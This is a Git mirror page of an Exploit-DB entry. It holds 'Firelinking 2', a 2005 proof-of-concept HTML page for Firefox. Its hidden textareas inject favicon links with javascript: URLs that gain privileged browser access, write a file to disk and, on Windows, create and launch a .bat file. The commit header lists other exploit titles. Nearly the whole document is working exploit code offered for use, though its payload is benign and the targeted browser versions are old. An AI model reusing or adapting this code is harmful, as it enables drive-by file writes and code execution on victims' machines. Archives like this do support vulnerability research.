bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/multiple/remote/1007.html
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

82 lines
3.9 KiB
HTML
Executable file
Raw Blame History

<html>
<head>
<title>Firelinking 2 - Proof-of-Concept by mikx</title>
<-- This PoC is cross platform : On Windows this example creates the file -->
<-- c:\booom.bat and launches it (opens a dos box with a dir command). On -->
<-- Linux (tested Fedora Core) and MacOSX the example creates the file -->
<-- ~/booom.txt or /booom.txt. Depending on caching the the script might -->
<-- run twice in some cases (this will create an additional booom-1.txt). -->
<link rel="SHORTCUT ICON" href="favicon.ico">
<script language="JavaScript" type="text/javascript">
var pf = navigator.platform.toLowerCase();
if (pf.indexOf("win") != -1) {
var os = "win";
} else if (pf.indexOf("mac") != -1) {
var os = "mac";
} else {
var os = "linux"
}
function runDemo() {
// this is an ugly caching workaround
document.getElementById('outhtml').innerHTML = "";
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
document.getElementById('outhtml').innerHTML += document.getElementById('clearhtml').value
window.setTimeout("document.getElementById('outhtml').innerHTML +=
document.getElementById('linkhtml_"+os+"').value",300);
}
</script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;">
<div style="font-family:Verdana;font-size:15px;font-weight:bold;">Firelinking 2 - Proof-of-Concept</div>
<br><br>
<div style="width:600px">
<div id="outhtml" style="display:none"></div>
<textarea id="clearhtml" style="display:none">
<link rel="SHORTCUT ICON" href="favicon.ico">
&lt;/textarea&gt;
<textarea id="linkhtml_win" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('
javascript:netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');
file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.
nsILocalFile);file.initWithPath(\'c:\\\\booom.bat\');file.createUnique(Components.interfaces.
nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
outputStream.init(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\n
PAUSE\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch();','','')">
&lt;/textarea&gt;
<textarea id="linkhtml_mac" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:
netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');file=Components.
classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(\'/booom.txt\');file.createUnique(Components.interfaces.nsIFile.
NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
outputStream.init(file,0x04|0x08|0x20,420,0);output=\'booom!\';outputStream.write
(output,output.length);outputStream.close();','','')">
&lt;/textarea&gt;
<textarea id="linkhtml_linux" style="display:none">
<link rel="SHORTCUT ICON" href="view-source:javascript:delayedOpenWindow('javascript:
netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');file=Components.
classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces.nsILocalFile);file.
initWithPath(\'~/booom.txt\');file.createUnique(Components.interfaces.nsIFile.
NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/network/
file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputStream);
outputStream.init(file,0x04|0x08|0x20,420,0);output=\'booom!\';outputStream.write
(output,output.length);outputStream.close();','','')">
&lt;/textarea&gt;
<br><br>
<a href="#" onclick="runDemo();runDemo();">Run exploit</a>
</div>
</body>
</html>
# milw0rm.com [2005-05-21]
Reference in a new issue View git blame Copy permalink